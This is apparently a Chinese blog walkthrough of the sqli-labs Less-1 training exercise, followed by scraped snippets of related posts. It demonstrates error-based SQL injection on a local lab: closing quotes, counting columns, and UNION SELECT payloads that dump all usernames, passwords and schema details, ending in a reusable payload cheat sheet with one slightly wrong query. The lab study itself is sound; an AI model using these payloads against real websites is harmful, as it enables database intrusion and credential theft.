sqli-lab 第一题 单引号 error based single quotes

一、第一次见面

1.初识

http://localhost/Less-1/

提示输入id,因此访问http://localhost/Less-1/?id=1

可以继续测试id=2.3.4等的情况,会输出不同的用户名和密码

2.进一步了解

每一次都会有不同的账号密码出来,当然肯定不能这样简单的访问。

既然题目说了存在单引号的错误,那就来试一下http://localhost/Less-1/?id=%27

没毛病报错了,说明单引号会被算入sql语句中

假设一下,这个sql语句是这样构造的:

$sql = "SELECT * FROM USER WHERE `id` = ‘$_GET["id"]‘  LIMIT 0,1;

如果我们的假设成立,那只要将单引号补全,然后就可以在后面添加自己的查找条件了,试一下。

只返回一条数据,很气人,可能只显示查询结果的第一条数据。

尝试一下永真式,1=1,‘1’=‘1’等。

关键的步骤是我们闭合自带的单引号并且在后面添加自己的语句,注释掉后面没用的语句。

对于注释我们使用

1.编码过的#也就是%23,因为#在html中是锚的意思,可以理解为标签,所以不会自动编码,需要手动编码

2.--与空格,但是空格在url中会被屏蔽,所以使用+代替,也就是--+或者--%20

二、动点小心思

1.我们想要一次性取出多个用户名和密码

所以构造http://localhost/Less-1/?id=1‘ or id=2 --+

但是我们发现只会返回一个用户名,所以我们猜测这里只会返回搜索到的所有结果的第一条(后来通过查看源码可以知道,真的是这样)

那么我们想,如果第一个结果数据为空,那么是不是就可以返回我们想要的第二条数据。

所以构造http://localhost/Less-1/?id=-1‘ or id=2 --+

果真返回了第二条数据。

如何查看这个user表中有几列呢?不知道列名。

我们通过排序,按照某一列排序,如果报错说明没有这一列

http://localhost/Less-1//?id=1‘ order by 4 %23

当按第四列排序时候出错,所以只有三列

可以看到只有第2列和第3列的结果显示在页面上,我们只有 2,3可以用,接下来我们就利用 2,3来查询数据库的信息

但是我们需要一次性获取多个用户名和密码,那么久用到了group_concat函数,该函数返回一个字符串结果,该结果由分组中的值连接组合而成。

意思就是说,一次只返回一个字符串的话,我们可以用这个函数把很多个结果合并成一个字符串一次性输出

构造http://localhost/Less-1/?id=-1‘ union select 1,group_concat(char(32),username,char(32)),group_concat(char(32),password,char(32)) from users --+

成功一次性返回所有的用户名和密码。

3. 有点太好奇

我们还是不满足,我们还想知道这个数据库名,用户名,数据库版本信息,那怎么办?

concat_ws():从数据库里取N个字段,然后组合到一起用符号分割显示,第一个参数剩余参数间的分隔符

char():将十进制ASCII码转化成字符

user():返回当前数据库连接使用的用户

database():返回当前数据库连接使用的数据库

version():返回当前数据库的版本

虽然不太会sql语句,但是看他列出的几个重要函数,大体的意思也就有了,看样子想要通过concat_ws()函数一次性取出多个数据然后合并成一条数据传出来破解对传出数据条数的限制。要获取的重要数据有数据库用户名、数据库名、数据库版本。。。

构建http://localhost/Less-1/?id=-1‘ union select 1,2,(concat_ws(char(32,58,32),user(),database(),version())) %23

数据库的一些基本信息就出来了,用户root,数据库名security。

三、不知羞耻,竟想看穿所有?

我们满足吗?

不满足!!

我们想要知道所有的信息,所有的库名、表名、列名等等。。。

先来学习一下

首先说一下mysql的数据库information_schema,他是系统数据库,安装完就有,记录是当前数据库的数据库,表,列,用户权限等信息,下面说一下常用的几个表:

SCHEMATA:储存mysql所有数据库的基本信息,包括数据库名,编码类型路径等,show databases的结果取之此表。

TABLES:储存mysql中的表信息,(当然也有数据库名这一列,这样才能找到哪个数据库有哪些表嘛)包括这个表是基本表还是系统表,数据库的引擎是什么,表有多少行,创建时间,最后更新时间等。show tables from schemaname的结果取之此表

COLUMNS:提供了表中的列信息,(当然也有数据库名和表名称这两列)详细表述了某张表的所有列以及每个列的信息,包括该列是那个表中的第几列,列的数据类型,列的编码类型,列的权限,列的注释等。是show columns from schemaname.tablename的结果取之此表。

我们想要了解所有信息,就要从这些信息下手,一步步脱光。。。脱裤。。。库。。。

接下在使用union来获取各种信息。

可以通过LIMIT来获取

http://localhost/Less-1/?id=-1‘ union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 LIMIT 3,3 %23

注意,查询information_schema中的信息时,使用where语句,那个值不能直接用英文,要用单引号包裹着,当然用其十六进制表示也可以,数值类型的就不用单引号了,这对过滤单引号应该有指导意义。

security的十六进制转换是:0x7365637572697479

16进制转换地址:http://www.bejson.com/convert/ox2str/

好了学会了union和group_concat()了,试一下

http://localhost/Less-1/?id=-1‘ union select 1,2,group_concat(char(32),table_name,char(32)) from information_schema.tables %23

这都返回了些啥??

加一个where筛选

http://localhost/Less-1/?id=-1‘ union select 1,2,group_concat(char(32),table_name,char(32)) from information_schema.tables   where table_schema=0x7365637572697479  %23

表名都出来了,那就看一些每个表里面都有啥

补充:

URL字符转义

用其它字符替代吧,或用全角的。

+    URL 中+号表示空格                                 %2B

空格 URL中的空格可以用+号或者编码           %20

/   分隔目录和子目录                                     %2F

?    分隔实际的URL和参数                             %3F

%    指定特殊字符                                          %25

#    表示书签                                                  %23

&    URL 中指定的参数间的分隔符                  %26

=    URL 中指定参数的值                                %3D

总结

提前写好一些常用的查询重要数据的sql语句

1. 查询用户名,数据库名,数据库版本信息:

union select 1,2,(concat_ws(char(32,58,32),user(),database(),version())) %23

2. 查询一个库中所有的表的名字

union select group_concat(char(32),table_name,char(32)) from information_schema.tables   where table_schema=0x7365637572697479  %23

注意。在系统自带的表中查东西,where后面的值应该是单引号包裹或者16进制编码,通常用16进制

3. 查询一个表中所有列的名字

union select group_concat(char(32),table_name,char(32)) from information_schema.COLUMNS   where table_schema=0x7365637572697479  %23

原文地址:https://www.cnblogs.com/Mountain2/p/8878000.html

时间: 2024-10-31 15:05:54

sqli-lab 第一题 单引号 error based single quotes的相关文章

华南理工数据结构大作业第一题单链表 删除创建等各种简易操作

#include<iostream> #include<windows.h> #include<string> /* (1) 初始化单链表h: (2) 依次插入5个元素:{"张三" , 85}, {"李四" , 95}, {"王五" , 75}, {"陈军" , 80}, {"程涛" , 90} (3) 输出单链表h的内容: (4) 输出单链表的长度: (5) 输出单链表

【sqli-labs】 less11 POST - Error Based - Single quotes- String (基于错误的POST单引号字符型注入)

查看源码,用户名和密码通过post提交 加单引号提交 出现报错,推测对应的SQL语句 select ... from ... where xxx=''' and yyy='123' limit 0,1 直接使用or构造永真登录 成功,注意此处登录的用户为表中的第一个用户 需要改变用户可以通过改变筛选条件实现 作为表中的第二个用户登录 如果在客户端进行了敏感字符的输入限定,可以直接使用hackbar提交POST数据绕过 如果采用构造这种输入,登录会失败,原因是因为and的优先级是高于or的 yyy

SQL报错注入结合sqli lab和百度杯CTF VId

0x00 背景 学习记录一下报错型的注入,经各方整理和自己总结形成. 所有的注入原理都是一样,即用户输入被拼接执行.但后台数据库执行语句产生错误并回显到页面时即可能存在报错注入. 0x01概念 报错型注入的利用大概有以下3种方式: 1:?id=2' and (select 1 from (select count(*),concat( floor(rand(0)*2),(select (select (查询语句)) from information_schema.tables limit 0,1

wfu省赛前练习赛(一)第一题

TEX is a typesetting language developed by Donald Knuth. It takes source text together with a few typesetting instructions and produces, one hopes, a beautiful document. Beautiful documents use " and " to delimit quotations, rather than the mund

SQLi Lab的视频教程和文字教程

SQLi Lab 系列的文字和视频(需要翻墙),讲解的很好 SQLi Lab Series - Introduction SQLi Lab Series - Error Based SQLi Lab Series - Double Query / SubQuery SQLi Lab Series - Blind Injection - Boolean Based SQLi Lab Series - Blind Injection - Time Based SQLi Lab Series - Us

LeetCode 第一题,Two Sum

今天早上起来去机房的路上还在想,一直不做算法题老是觉得不踏实.做做题总是让自己觉得自己真的在做做学习.... 这也算是一种强迫症吧. 那就从今天开始做做LeetCode,因为好久没做过了,所以第一题还是看了别人的题解和思路,算是找找感觉. 总的来说第一题是个水.... 题目还原 Two Sum Given an array of integers, find two numbers such that they add up to a specific target number. The fu

MyBatis做动态模糊查询时,like后面要不要加单引号??

做项目遇到了个奇怪的问题,项目里面要对商品.账户.进行分别的多条件查询,于是我就采用动态多条件分页查询,起初在做账户部分的时候Mybatis是这样写的 <!-- 动态多条件分页查询 --> <select id="searchPageUseDyc" parameterType="page" resultMap="accountResultMap"> select acc_id,acc_login,acc_name,acc_

Linux 命令中的单引号,不加任何参数以及双引号的作用

单引号: 可以说是所见即所得:即将单引号内的内容原样输出,或者描述为单引号里面看到的是什么就会输出什么.单引号''是全引用,被单引号括起的内容不管是常量还是变量者不会发生替换. 双引号: 把双引号内的内容输出出来:如果内容中有命令.变量等,会先把变量.命令解析出结果,然后在输出最终内容来.双引号""是部分引用,被双引号括起的内容常量还是常量,变量则会发生替换,替换成变量内容. 不加引号: 不会将含有空格的字符串视为一个整体输出, 如果内容中有命令.变量等,会先把变量.命令解析出结果,然

oracle中的转义符 - 在oracle中插入单引号与&#39;&amp;&#39;

1.单引号 那么如果字段的内容中包含了单引号要怎么插入呢?例如:It's fine.方法同样有三·方法一:使用转义字符   SQL > Select 'test' || '''' from dual;   注意:这里的''''四个单引号是什么意思呢?首先第一个和最后一个都是Oracle中的字符串连接符,这个没有异议.那么第二个'和第三'又表示什么意思呢?第二个'是一个转义字符           第三个'才是我们真正的内容·方法二:同样是使用转义字符,只不过方式不同而已   SQL > Sel